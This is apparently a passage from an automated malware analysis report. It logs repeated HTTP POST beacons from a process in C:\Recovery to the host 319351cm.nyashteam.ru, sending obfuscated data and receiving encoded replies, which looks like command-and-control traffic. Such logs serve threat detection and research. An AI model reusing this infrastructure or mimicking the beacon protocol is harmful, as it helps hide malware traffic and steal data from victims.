Dec 6, 2024 03:12:53.967792034 CET	1012	OUT	Data Raw: 56 56 5a 5a 59 50 53 5b 5c 56 52 5a 50 58 5a 51 58 52 5b 5f 50 58 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VVZZYPS[\VRZPXZQXR[_PXVYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@(39[>!#R<'^';&&<8$._*.<7?1&"+;V/']/!Q!(
Dec 6, 2024 03:12:54.704113960 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:54.968552113 CET	803	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c2nNEu1hmPbIVs0f6p3Cwd%2BLjQV6qHnbo7swmoQF5QjKhBgR9NBoSfG2jXf6UFQr57sQbEvIqjh6HJSxjWrB6TANzcYZ4XsjWlVK8uEcAs9njtTVqAC5XFrm85ykrk9VzJf1hFpYbYo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0f0ea396a50-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4048&min_rtt=2041&rtt_var=4780&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=80667&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49849	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:55.211812973 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:55.561392069 CET	1012	OUT	Data Raw: 56 5e 5f 5e 5c 5f 53 58 5c 56 52 5a 50 5c 5a 53 58 5a 5b 5e 50 59 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V^_^\_SX\VRZP\ZSXZ[^PYVXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!=)[>!3W+81;%'+_>=?Y <"':"8/-']/!Q!8
Dec 6, 2024 03:12:56.298325062 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:56.563425064 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRZ7zJMSCsm5C5KQ4krcqzMKfW9GWyl5%2FWVCBk54WWep2RNvbBB2a%2BLK28z1PvKQD8NZl0kfD5p4pYXBVk7EF%2FWAgAUkNoL%2FkoBDXW1yxh8XSPGs7sH3aPkXL9erRBI6eKzWqMCdav8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0fae94b8c51-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3963&min_rtt=2005&rtt_var=4668&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=82616&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49854	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:56.804177999 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:57.155116081 CET	1012	OUT	Data Raw: 53 53 5f 5e 59 5c 53 58 5c 56 52 5a 50 5c 5a 56 58 59 5b 56 50 55 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SS_^Y\SX\VRZP\ZVXY[VPUVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!*0>T,+5&;"$<';%)>] ?R1#"(+U.-']/!Q!8
Dec 6, 2024 03:12:57.945195913 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:58.224590063 CET	804	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F7dWmH%2F5EtWqNTGIeJprvwawffYJ3Dpi2YwnoFzMKRRdTSUUEvtzm3iiGWoyAgmKM3AniJX9QwNKx5ulqAKY6PLmEZmbzY2uUsbJfZTiR8sJwQiMpjxxE0jEjAPsBC2OaQFY3ST0nBM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c104ffc97d02-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=9584&min_rtt=1827&rtt_var=16200&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=22852&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49860	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:58.557847023 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1268 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:58.905085087 CET	1268	OUT	Data Raw: 56 56 5f 5d 59 5e 56 59 5c 56 52 5a 50 5d 5a 53 58 53 5b 5e 50 59 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VV_]Y^VY\VRZP]ZSXS[^PYV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!!+T>%1%Z 3].Y)>!/"%(#(?T8']/!Q!
Dec 6, 2024 03:12:59.662643909 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:59.966892958 CET	961	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wi54Ut29aQs7n%2But96MuD4Dl27Ko2xAeyo7vj5R5GFeLbZG9uzO9t459rM66lZ930y7CQdgpL9dBAR9ttRbydnLPd0AVxpr3pq83BCdAT%2BXkPyenf4YaVv5da%2BvZ82kS%2Bs%2FoX2SXp2Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c10fef9a41e1-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=9674&min_rtt=4784&rtt_var=11574&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1565&delivery_rate=33252&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 01 30 3e 2f 00 36 31 33 07 39 2d 38 56 31 3e 32 06 39 38 20 58 22 2b 1b 5f 2b 3c 30 12 30 24 3b 5c 3d 02 32 03 3c 11 0a 0c 29 02 23 5b 00 13 26 5b 3d 5b 2a 1a 3e 00 24 5c 26 23 2a 5c 3e 08 3a 58 28 2e 33 53 23 5c 21 5e 23 2d 23 0b 30 13 27 1d 2c 1b 34 5a 3f 51 3e 51 25 24 21 5e 0e 11 39 1d 32 33 26 5b 23 16 09 1f 27 30 0d 07 3c 00 23 02 26 3f 09 54 3c 27 38 55 25 21 25 56 33 3f 3b 0d 25 39 32 5b 20 3c 38 09 2c 2c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&0>/6139-8V1>298 X"+_+<00$;\=2<)#[&[=[>$\&#\>:X(.3S#\!^#-#0',4Z?Q>Q%$!^923&[#'0<#&?T<'8U%!%V3?;%92[ <8,,#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49861	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:58.677903891 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:59.030294895 CET	1012	OUT	Data Raw: 56 51 5f 51 59 50 56 5f 5c 56 52 5a 50 58 5a 54 58 59 5b 5e 50 5b 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQ_QYPV_\VRZPXZTXY[^P[VUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E)09Y)3W(6;]'8-2+U'!>?Y7?%T'*'#(;-']/!Q!(
Dec 6, 2024 03:12:59.765707016 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:00.118086100 CET	813	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OwHZ2pGQr3wMNGApLHryXLwrxAR1zNec8dhhqPBWFGUC07QdEJwQd%2FmUaqVSwbotU9%2B2fK9%2F18ql3TCUnQRbJQ1BcWiMx3hZIJR%2FsPMzyyyGzt%2BG8qinhZDnCFDfVt6g%2FPhuB102Qls%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1108ceb437b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4587&min_rtt=2062&rtt_var=5824&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=65564&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49868	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:00.420259953 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:13:00.764731884 CET	1012	OUT	Data Raw: 56 56 5f 5d 59 50 53 5b 5c 56 52 5a 50 5f 5a 55 58 53 5b 59 50 5c 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VV_]YPS[\VRZP_ZUXS[YP\V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!=31[?";V?%&;*%408%=.+Z4,=%3^"(#,-']/!Q!4
Dec 6, 2024 03:13:01.511393070 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:01.774591923 CET	814	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2BJd7UXuPW8Ot7OBL18AgH6jQ%2FKfi4sG%2FRQkRcFNzM6xuhlS7IptTeY0yD0gvPdhw5vpbXfAoT5L6CLA77PTtRtoTVmrvBtp4YbhptdYkoubAeeZupw9c%2FLZHkJ1so%2B8Me%2FbKMODiok%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c11b7caa0f7f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8223&min_rtt=1645&rtt_var=13774&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=26900&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49871	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:02.022102118 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue
Dec 6, 2024 03:13:02.373888969 CET	1008	OUT	Data Raw: 53 55 5f 5c 59 5f 56 58 5c 56 52 5a 50 5a 5a 56 58 5d 5b 5c 50 58 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SU_\Y_VX\VRZPZZVX][\PXV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A=31*1;?S']';W%?$'=>X(7.1\'X6;'W.=']/!Q!(
Dec 6, 2024 03:13:03.129143953 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:03.455615044 CET	812	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNIadKCX27GUl%2F9Jrue%2BKNS6o4rqXojfZN2zOjK1eh6vbSV0QKZm4gxhaONHHZWRM3Aij%2FhHrV9KWaCjVUG%2BFUXu%2ByZ7Z6KzDTosOCwwEhok8tKVb5Vhe7auU1NssE9c7DdZ0%2FpUpzs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1259c154387-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3750&min_rtt=2115&rtt_var=4064&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1281&delivery_rate=96058&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49876	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:03.695694923 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:04.045917034 CET	1012	OUT	Data Raw: 56 55 5a 59 5c 58 56 58 5c 56 52 5a 50 53 5a 5c 58 53 5b 58 50 5c 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VUZY\XVX\VRZPSZ\XS[XP\V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP")0>T#R? &;%R20=(-+]4>%\?!8</-']/!Q!
Dec 6, 2024 03:13:04.862462044 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49881	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:05.121045113 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:05.467696905 CET	1296	OUT	Data Raw: 56 52 5f 5a 59 51 53 5f 5c 56 52 5a 50 5d 5a 56 58 5a 5b 56 50 54 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VR_ZYQS_\VRZP]ZVXZ[VPTVUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E>01)2'(21%?3;*(4/!W&:X!;/-']/!Q!
Dec 6, 2024 03:13:06.207357883 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:06.478293896 CET	964	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMfltLsNTtNXDb0MLSNy8PMu7iaoNsVIP719kE5UcI%2FczJLvoS8EEQkP%2B%2F7r2dxlPc8uX%2BBNTo5534ZdATLZrL%2BnfWK%2B9Enag5BH2Rp36Z7GGt30HX8nZs0aY%2F8AIupIyeEvutKmjjw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c138db3a42c0-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3362&min_rtt=1677&rtt_var=3999&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=96312&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 04 27 04 23 06 35 32 06 58 2c 2d 3c 13 31 3d 2d 5b 2d 01 2c 5d 35 15 2a 01 3f 01 24 56 30 1a 06 00 2a 3c 29 5f 28 3f 0a 0e 3e 02 23 5b 00 13 26 15 29 03 3a 1a 29 07 23 05 27 33 0b 00 29 08 39 04 2a 2d 23 52 23 3a 2a 01 22 2d 33 09 26 2d 27 1d 2c 36 34 5a 28 37 36 53 25 34 21 5e 0e 11 39 50 26 33 32 5e 21 2b 28 0c 27 33 38 13 28 5f 20 58 24 3f 23 55 2b 34 3f 0b 30 21 0b 55 33 01 0a 56 26 2a 39 07 34 2c 23 12 39 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&'#52X,-<1=-[-,]5?$V0<)_(?>#[&):)#'3)9-#R#:"-3&-',64Z(76S%4!^9P&32^!+('38(_ X$?#U+4?0!U3V&*94,#9<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49882	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:05.241183043 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:05.592861891 CET	1012	OUT	Data Raw: 56 57 5f 51 59 5c 56 59 5c 56 52 5a 50 5f 5a 55 58 59 5b 5c 50 5c 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VW_QY\VY\VRZP_ZUXY[\P\V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>>=3(6(&+T$,%;Y=-3Z#?2%'\68;']/!Q!4
Dec 6, 2024 03:13:06.353595018 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:06.611742973 CET	814	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G4y0JTNSEgDRImS7brRMTgPY0kOO6Q9n1TnBucG3syir09vrcPWajiC7rXoUQt%2F6xsDmX62cdtkAWkO9nel%2FGZSD%2B0mT5%2FsuWuk%2FzkaLFartVNOkMhG4U4FSQVDvYrvjVE%2BNN14J1do%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c139ab4a6a5e-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6728&min_rtt=1703&rtt_var=10689&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=34839&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49888	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:06.850641966 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
